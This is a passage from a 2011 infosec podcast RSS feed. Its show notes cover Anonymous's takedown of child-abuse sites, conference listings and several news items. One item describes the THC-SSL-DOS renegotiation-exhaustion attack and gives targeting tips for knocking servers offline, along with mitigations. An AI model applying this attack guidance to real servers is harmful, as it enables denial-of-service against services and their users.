	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous said that after warnings to remove the illegal content went unheeded it infiltrated the server and shut down services to all users.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacker group boasted that one of the websites it took down was &quot;one of the largest child pornography websites to date containing more than 100GB of child pornography.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anonymous said it released the</span><a href="http://pastebin.com/88Lzs1XR"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">information about users</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> of that website, including usernames, how long they have been active on the site and how many images they have shared. According to the crime-related blog</span><a href="http://www.dreamindemon.com/2011/10/21/anonymous-takes-down-child-porn-sites-releases-users-names/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">DreaminDemon</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the hacking group also claims to have learned the identities of some of the people on the list and have invited the FBI to contact them if they wanted the details.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group also warned that its comments on Pastebin &#8211; a website where you can store text online for a set period of time &#8211; are aimed at anyone on the internet who commits similar acts. &quot;It does not matter who you are, if we find you to be hosting, promoting, or supporting child pornography, you will become a target,&quot; Anonymous said.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.thc.org/thc-ssl-dos/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thc.org/thc-ssl-dos/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">THC-SSL-DOS is a tool to verify the performance of SSL. Establishing a secure SSL connection requires 15x more processing power on the server than on the client. THC-SSL-DOS exploits this asymmetric property by overloading the server and knocking it off the Internet. This problem affects all SSL implementations today. The vendors are aware of this problem since 2003 and the topic has been widely discussed.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Comparing flood DDoS vs. SSL-Exhaustion attack</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A traditional flood DDoS attack cannot be mounted from a single DSL connection. This is because the bandwidth of a server is far superior to the bandwidth of a DSL connection: A DSL connection is not an equal opponent to challenge the bandwidth of a server.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tips &amp; Tricks for Whitehats</span></p>
<ol>
<li style="list-style-type:decimal;font-size:11pt;font-family:Arial;color:#3f312e;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU.</span></li>
<li style="list-style-type:decimal;font-size:11pt;font-family:Arial;color:#3f312e;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.</span></li>
<li style="list-style-type:decimal;font-size:11pt;font-family:Arial;color:#3f312e;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, &hellip; or the secure database port).</span></li>
</ol>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Counter measurements</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">No real solutions exists. The following steps can mitigate (but not solve) the problem:</span></p>
<ol>
<li style="list-style-type:decimal;font-size:11pt;font-family:Arial;color:#3f312e;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Disable SSL-Renegotiation</span></li>
<li style="list-style-type:decimal;font-size:11pt;font-family:Arial;color:#3f312e;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Invest into SSL Accelerator</span></li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-503-rules-of-engagement-anonymous-targets-thc-ssl-mitsubishi-leak-macbook-pro-wam/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3013/0/infosec-daily-podcast-episode-503.mp3" length="18178234" type="audio/mpeg" />
		<itunes:duration>0:37:49</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 503 for October 25, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Themson Mester.
	Announcements:
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehno[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 503 for October 25, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Themson Mester.
	Announcements:
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	Cost = FREE
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.defense.gov/news/newsarticle.aspx?id=65739
	New doctrine under review by the Joint Staff will lay out rules of engagement against an attack in cyberspace, the commander of U.S. Cyber Command said today.
	The doctrine, once adopted, will help to define conditions in which the military can go on the offensive against cyber threats and what specific actions it can take, Army Gen. Keith B. Alexander told reporters at an International Systems Security Association conference here.
	It will support the Defense Department&#8217;s strategy for operating in cyberspace, released in July, and President Barack Obama&#8217;s international cyberspace strategy, the general added.
	Once the doctrine is approved, Cyber Command will put out guidance to its cyber warriors spelling out, &#8220;Here is how we operate in cyberspace,&#8221; and tailor its training accordingly, Alexander said. In the meantime, the laws of land warfare and law of armed conflict apply to cyberspace, he said. The challenge, he explained, is how to translate laws that govern physical space to cyberspace &#8211; now a fifth domain of conflict.
	&#8220;That is what the Defense Department and others are working right now: to come up with the standing rules of engagement and those different parts,&#8221; he said.
	Among issues the Defense Department is considering, Alexander said, is what constitutes a war in cyberspace.
	The United States also must determine what represents a reasonable and proportional response to a cyber attack, he said. The law of armed conflict authorizes a reasonable, proportional defense against a physical attack from another country. Extending that logic to cyberspace, Alexander said, it remains unclear if it includes authority to shut down a computer network, even if it&#8217;s been taken over by a malicious cyber attacker intent on destruction.
	If it does, also left unanswered so far is who would have that authority: the FBI, the National Security Agency, the military, the Inter[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 502 &#8211;  The List &amp; Incriminating Searches</title>
		<link>http://www.isdpodcast.com/episode-502-the-list-incriminating-searches</link>
		<comments>http://www.isdpodcast.com/episode-502-the-list-incriminating-searches#comments</comments>
		<pubDate>Tue, 25 Oct 2011 00:50:07 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3007</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 502 for October 24, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dave Kennedy, Beau Woods and Varun Sharma. Announcements: NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia http://nordsec2011.cyber.ee/ New Hampshire InfoSec Tweetup When: October 29, 2011 Where: Pawtuckaway State Park in Nottingham, NH [...]]]></description>
			<content:encoded><![CDATA[<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 502 for October 24, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dave Kennedy, Beau Woods and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just abunch of likeminded people and some good food.)</span></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span></a><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span></a><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
	<a href="http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011<br class="kix-line-break" /><br />
	</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost = FREE</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br class="kix-line-break" /><br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://pentest.cryptocity.net/careers"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://pentest.cryptocity.net/careers</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Views on careers in information security careers based on the experience and your mileage may vary. The information below will be most appropriate if you live in New York City, you&#39;re interested in application security, pentesting, or reversing, and you are early on in your career in information security.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.techdirt.com/articles/20111020/06093416431/hint-if-you-commit-crime-do-not-google-every-aspect-it-afterwards.shtml"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.techdirt.com/articles/20111020/06093416431/hint-if-you-commit-crime-do-not-google-every-aspect-it-afterwards.shtml</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Techdirt has reported on a number people accused of murder googling for things like &quot;neck snap break&quot; or &quot;how to commit murder&quot; beforehand, and leaving these suggestive details on their computers. Those were some years back, and since then there has been plenty of attention given to the idea that your search histories provide a great deal of information about what you were thinking &#8211; and possibly even what you were thinking about doing.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">So you would expect people by now would have learned to be a little more cautious &ndash; for example, by carrying out searches anonymously at different Internet cafes. But the story of Vincent Tabak, whose case is currently going through UK courts, suggests that message still hasn&#39;t got across. The court has been hearing about his intensive use of the Internet to research a range of topics after killing a woman called Joanna Yeates (he admits manslaughter, but denies murder):</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">The 33-year-old defendant &#8230; looked up satellite imagery of the site where he dumped Yeates&#39;s body. He researched the Wikipedia page for murder and maximum sentence for manslaughter, web records from work and personal laptops showed.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">While regularly checking the Avon and Somerset police website and local news site www.thisisbristol.co.uk, the Dutch engineer was also checking decomposition rates.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Days after killing Yeates at her Clifton flat on 17 December, Tabak was watching a timelapse video of a body decomposing, Bristol crown court heard.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That&#39;s a reminder of just how much detailed information about past Internet activity can be gleaned from computers, and how incriminating that might be in certain circumstances. On the other hand, perhaps we should be grateful that people committing crimes are still making it so easy to convict them on the basis of their tell-tale online activity. </span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-502-the-list-incriminating-searches/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3007/0/infosec-daily-podcast-episode-502.mp3" length="20365624" type="audio/mpeg" />
		<itunes:duration>0:42:23</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 502 for October 24, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dave Kennedy, Beau Woods and Varun Sharma.
	Announcements:
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn [...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 502 for October 24, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Dave Kennedy, Beau Woods and Varun Sharma.
	Announcements:
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
